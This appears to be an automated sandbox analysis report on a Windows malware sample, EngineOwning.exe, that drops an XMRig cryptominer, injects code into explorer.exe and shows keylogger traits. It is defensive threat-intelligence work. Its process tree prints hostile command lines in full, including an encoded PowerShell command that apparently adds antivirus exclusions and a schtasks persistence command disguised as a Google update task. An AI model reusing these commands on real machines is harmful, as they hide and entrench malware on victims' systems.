Windows
Analysis Report
EngineOwning.exe
Overview
General Information
Detection
Xmrig
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Queries memory information (via WMI often done to detect virtual machines)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
DNS related to crypt mining pools
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
PE file contains section with special chars
Writes to foreign memory regions
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates driver files
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Sigma detected: Suspicious Execution of Powershell with Base64
Classification
- System is w10x64
- EngineOwning.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\EngineOwning.exe" MD5: 6B7E5F4517D6837EEA3C06BAE837F767)
- conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 3012 cmdline: C:\Windows\system32\cmd.exe /c start C:/ProgramData/winrsdhost.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- winrsdhost.exe (PID: 5428 cmdline: C:/ProgramData/winrsdhost.exe MD5: 108368196293017A706ADE912F519495)
- cmd.exe (PID: 588 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6744 cmdline: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
- cmd.exe (PID: 2056 cmdline: C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 5444 cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
- cmd.exe (PID: 6644 cmdline: C:\Windows\System32\cmd.exe" cmd /c "C:\Users\user\AppData\Roaming\Windows\services86.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- services86.exe (PID: 6232 cmdline: C:\Users\user\AppData\Roaming\Windows\services86.exe MD5: 108368196293017A706ADE912F519495)
- cmd.exe (PID: 6036 cmdline: C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 2996 cmdline: powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A" MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6540 cmdline: C:\Windows\System32\conhost.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- conhost.exe (PID: 5912 cmdline: C:\Windows\System32\conhost.exe" "pbsidfqjdbrp MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- explorer.exe (PID: 5388 cmdline: C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng= MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 5956 cmdline: C:\Windows\system32\cmd.exe /c start C:/ProgramData/mdsigstub.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- mdsigstub.exe (PID: 6436 cmdline: C:/ProgramData/mdsigstub.exe MD5: 62D39F4717804AE34F820704722C5284)
- WerFault.exe (PID: 3376 cmdline: C:\Windows\system32\WerFault.exe -u -p 6436 -s 1072 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
- cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- WerFault.exe (PID: 6640 cmdline: C:\Windows\system32\WerFault.exe -u -p 7076 -s 1908 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
- svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5576 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 4516 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6312 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5872 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth | |
| | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth | |

(5 of 31 entries shown)
Source | Rule | Description | Author | Strings
---|---|---|---|---
| | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | |
| | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | |
| | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | |
| | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | |
| | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth | |

(5 of 53 entries shown)
Source | Author
---|---
| | frack113 |
| | frack113 |
| | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
| | frack113 |
| | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
No Snort rule has matched
AV Detection

Source | Entries
---|---
Avira | 5
Virustotal (Perma Link) | 1
ReversingLabs | 1
Virustotal (Perma Link) | 1
Metadefender (Perma Link) | 1
ReversingLabs | 1
Virustotal (Perma Link) | 1
ReversingLabs | 1
Virustotal (Perma Link) | 1
Metadefender (Perma Link) | 1
ReversingLabs | 2
Joe Sandbox ML | 5
Avira | 2
Bitcoin Miner

Source | Entries
---|---
File source | 32
String found in binary or memory | 6
DNS query | 1
HTTPS traffic detected | 1
Static PE information | 1
Binary string | 2
Code function | 1
Networking

Source | Entries
---|---
DNS query | 1
String found in memory | 3
JA3 fingerprint | 1
HTTP traffic detected | 2
IP Address | 2
String found in binary or memory | 52
DNS traffic detected | 1
Code function | 1
HTTP traffic detected | 2
Network traffic detected | 4
String found in binary or memory | 3